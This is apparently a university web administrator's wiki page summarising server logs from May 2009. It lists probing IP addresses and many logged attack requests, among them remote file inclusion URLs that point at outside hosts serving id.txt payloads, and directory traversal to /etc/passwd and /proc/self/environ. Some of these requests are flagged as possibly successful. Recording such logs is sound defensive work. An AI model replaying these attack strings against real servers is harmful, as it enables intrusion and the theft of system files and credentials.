/organizations/sname/ingalls02pics2.html&h ... hl=en&start=420: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=421: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=422: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=424: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=425: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=426: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=427: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=428: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=429: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=480: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... oc/self/environ: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... self/environ%00: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=http ... hu/buggsbunny??: 1 Time(s)
/~dare/me/punk/rocker.html: 1 Time(s)
/~elseifi: 1 Time(s)
/~grasmeye/photos/allison/: 2 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~grasmeye/photos/index.html: 2 Time(s)
405 Method Not Allowed
/ferror.txt: 1 Time(s)
/~hokiesat/: 1 Time(s)
/~mason/: 1 Time(s)
416 Request Range Not Satisfiable
/~kashin/courses/aoe4065/Files/SystemAnalysis.pdf: 1 Time(s)
May 19, 2009 Log Analysis
A total of 7 sites probed the server
121.246.105.26 140.159.2.32 141.212.51.1 59.180.142.136 76.4.48.141 90.215.231.235 91.212.16.8
400 Bad Request
www.aoe.vt.edu/news/news.php?gashar=GASHAR ... =SBD_MAKE_VOICE: 1 Time(s)
404's
///google.ro/path=http://208.98.22.241/id.txt????: 1 Time(s)
//bemarket/postscript/postscript.php?p_mod ... load/pw.txt????: 1 Time(s)
//board/board.php?code=http://163.26.12.232/gambar.jpg???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/calendars/phpScheduleIt/reserve.php: 1 Time(s)
/calendars/phpScheduleIt/roschedule.php?da ... 008&scheduleid=: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 4 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/people//board/board.php?code=http://163.2 ... 2/gambar.jpg???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/// ... .241/id.txt????: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... .241/id.txt????: 1 Time(s)
/~gaylord//bemarket/postscript/postscript. ... load/pw.txt????: 1 Time(s)
/~gaylord/ps.to.eps.html//bemarket/postscr ... load/pw.txt????: 1 Time(s)
May 20, 2009 Log Analysis
A total of 4 sites probed the server 143.248.72.100 205.243.148.151 67.19.50.178 90.55.42.112
A total of 3 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /~lscharf/scripts/homepages.php.txt/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /~lscharf/scripts/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
Requests with error response codes
400 Bad Request
HTTP/1.1: 10 Time(s)
404's
//photo_comment.php?toroot=http://www.die- ... ad/fx29id.txt??: 1 Time(s)
/3DLDV/wb23000/data.html: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Papers/SNAME2003Grounding2.pdf: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... ower+system+ppt: 1 Time(s)
/include/images/trans.gif: 113 Time(s)
/include/lib.inc.php?site_path=http://www. ... aries/id.txt???: 2 Time(s)
/mail//bin/msgimport: 5 Time(s)
/mail2//bin/msgimport: 5 Time(s)
/mss2//bin/msgimport: 5 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 0YxNlMwNC5wZGY=: 1 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 29uaWNzLnBkZg==: 1 Time(s)
/pubs/catalog/c523.htm: 1 Time(s)
/rc//bin/msgimport: 5 Time(s)
/rms//bin/msgimport: 5 Time(s)
/round//bin/msgimport: 5 Time(s)
/roundcube-0.1//bin/msgimport: 5 Time(s)
/roundcube-0.2//bin/msgimport: 5 Time(s)
/roundcube//bin/msgimport: 5 Time(s)
/roundcubemail-0.1//bin/msgimport: 5 Time(s)
/roundcubemail-0.2//bin/msgimport: 5 Time(s)
/roundcubemail//bin/msgimport: 5 Time(s)
/search.php: 6 Time(s)
/sitemap.xml: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 0YxNlMwNC5wZGY=: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 29uaWNzLnBkZg==: 1 Time(s)
/webmail//bin/msgimport: 5 Time(s)
/webmail2//bin/msgimport: 5 Time(s)
/wm//bin/msgimport: 5 Time(s)
/~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ad/fx29id.txt??: 1 Time(s)
/~hokiesat/hsat_files/filelist.xml: 1 Time(s)
/~hokiesat/include/lib.inc.php?site_path=h ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/gps-crosslink/Final%20APL% ... tation/out.html: 1 Time(s)
/~hokiesat/subs/include/lib.inc.php?site_p ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/power/S02%20documenta...ec ... ia/Roseid.txtt?: 3 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/include ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/include/lib.inc.php ... aries/id.txt???: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 3 Time(s)
405 Method Not Allowed
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
416 Request Range Not Satisfiable
/~mason/Mason_f/ConfigAeroHiLift.pdf: 1 Time(s)
May 20, 2009 Log Analysis
A total of 6 sites probed the server
188.129.88.254 193.109.135.145 200.234.200.158 210.5.217.218 65.23.154.225 85.241.26.61
A total of 2 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
/index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP Response 200 /index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200
400 Bad Request
/404.shtml: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
403 Forbidden
/research/: 20 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=6: 1 Time(s)
/research/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/?mode=area_selected&thesis_area=3: 1 Time(s)
/research/?mode=area_selected&thesis_area=4: 1 Time(s)
/research/?mode=area_selected&thesis_area=5: 1 Time(s)
/research/?mode=area_selected&thesis_area=6: 1 Time(s)
/robots.txt: 33 Time(s)
404 Not Found
/%7Emason/Mason_f/errors.php?error=http:// ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.long ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... self/environ%00: 1 Time(s)
////Packages.php?sourcedir=http://dunpo.wi ... et/id.txt?%0D??: 2 Time(s)
//beacon/language/1/splash.lang.php?langua ... oc/self/environ: 1 Time(s)
//beacon/language/1/splash.lang.php?langua ... self/environ%00: 1 Time(s)
//include/bbs.lib.inc.php?site_path=http:/ ... data/idfx1.txt?: 1 Time(s)
//new.php?id=http://80.24.176.145/time//appserv/file.txt???: 1 Time(s)
//photo_comment.php?toroot=http://rsh.kiev ... ges/idfx1.txt??: 2 Time(s)
//plugins/dbal.php?eqdkp_root_path=http:// ... aries/id.txt???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/_vti_aut/author.dll: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/a: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1331: 4 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... esigns+for+kids: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi/1202: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/errors.php?error=http://www.longbeachphot ... ca/buggsbunny??: 3 Time(s)
/favicon.ico: 24 Time(s)
/general.php: 22 Time(s)
/giving/general.php: 1 Time(s)
/giving/wishlist.php: 2 Time(s)
/groups/caplab/research/capvte: 1 Time(s)
/help/login.php?PHPSESSID=02c369bd3ef20d55d6142b896b18b2f9: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... oc/self/environ: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... self/environ%00: 1 Time(s)
/home.php?pg=http://www.longbeachphotosbc.ca/buggsbunny??: 1 Time(s)
/news//new.php?id=http://80.24.176.145/tim ... erv/file.txt???: 1 Time(s)
/organizations//beacon/language/1/splash.l ... oc/self/environ: 1 Time(s)
/organizations//beacon/language/1/splash.l ... self/environ%00: 1 Time(s)
/organizations/aiaa: 1 Time(s)
/organizations/aiaa/: 3 Time(s)
/organizations/aiaa//beacon/language/1/spl ... oc/self/environ: 1 Time(s)
/organizations/aiaa//beacon/language/1/spl ... self/environ%00: 1 Time(s)
/organizations/aiaa/errors.php?error=http: ... ca/buggsbunny??: 2 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... oc/self/environ: 1 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... self/environ%00: 1 Time(s)
/organizations/aiaa/home.php?pg=http://www ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/images/Joshua_Davidson_Personal.jpg: 1 Time(s)
/organizations/aiaa/index.php: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... oc/self/environ: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... self/environ%00: 1 Time(s)
/organizations/aiaa/index.php?go=companies: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 3 Time(s)
/organizations/aiaa/index.php?go=http://ww ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/index.php?go=links: 2 Time(s)
/organizations/aiaa/index.php?go=whatisaiaa: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=0 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... acy-viagra.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-ca ... acy-dosage.html: 1 Time(s)
/organizations/errors.php?error=http://www ... ca/buggsbunny??: 2 Time(s)
/organizations/home.php?pg=../../../../../ ... oc/self/environ: 1 Time(s)
/organizations/home.php?pg=../../../../../ ... self/environ%00: 1 Time(s)
/organizations/home.php?pg=http://www.long ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php: 1 Time(s)
/organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s)
/organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s)
/organizations/index.php?go=companies: 1 Time(s)
/organizations/index.php?go=contacts: 1 Time(s)
/organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s)
/organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s)
/organizations/index.php?go=companies: 1 Time(s)
/organizations/index.php?go=contacts: 1 Time(s)
/organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php?go=links: 1 Time(s)
/organizations/index.php?go=whatisaiaa: 1 Time(s)
/organizations/index.php?go=whatwedo: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... oc/self/environ: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... self/environ%00: 1 Time(s)
/source/mod/rss/view.php?Codebase=http://w ... ca/buggsbunny??: 1 Time(s)
/sources/lostpw.php?CONFIG[path]=http://du ... et/id.txt?%0D??: 2 Time(s)
/~cdhall/papers/AIAA-11014-738.pdf//?r=htt ... om/fx29id.txt??: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey//plugins/dbal.php?eqdkp_root_pa ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Courses//plugins/dbal.php?eqdkp ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134//plugins/dbal.p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental//p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... aries/id.txt???: 2 Time(s)
/~durham/AOE5214/Ch08.pdf//?x=http://www.r ... a2/drivid.txt??: 1 Time(s)
/~hokiesat//include/bbs.lib.inc.php?site_p ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/Plans_Procedures_and_Results/Te ... es/editdata.mso: 2 Time(s)
/~hokiesat/index2_files/filelist.xml: 1 Time(s)
/~hokiesat/subs//include/bbs.lib.inc.php?s ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring//include/bbs.lib.in ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... data/idfx1.txt?: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... om/fx29id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://r ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason////Packages.php?sourcedir=ht ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html////Packages.p ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... .241/id.txt????: 1 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html/sources/lostp ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/sources/lostpw.php?CONFIG[pa ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 1 Time(s)
/~mason/Mason_f/MailOrder.html: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//phot ... ges/idfx1.txt??: 2 Time(s)
405 Method Not Allowed
/highlander.htm: 1 Time(s)
/~cdhall/: 1 Time(s)
/~hokiesat/: 5 Time(s)
/~mason/: 2 Time(s)
to remove the PHPSESSIONIDs
Investigate modsecurity and suhosin
aoe/webserverhack.txt · Last modified: 1970/01/18 07:09 by 127.0.0.1